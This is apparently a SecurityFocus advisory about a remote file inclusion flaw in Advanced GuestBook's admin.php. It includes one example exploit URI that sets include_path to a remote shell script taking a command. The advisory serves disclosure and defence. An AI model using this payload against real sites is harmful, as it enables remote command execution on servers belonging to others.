Advanced GuestBook Admin.PHP Remote File Include Vulnerability

Attackers can exploit this issue via a web client.

The following example URI is available:

http://www.example.com/[AGuest Path]/admin.php?include_path=Shell?cmd


 

Privacy Statement
Copyright 2010, SecurityFocus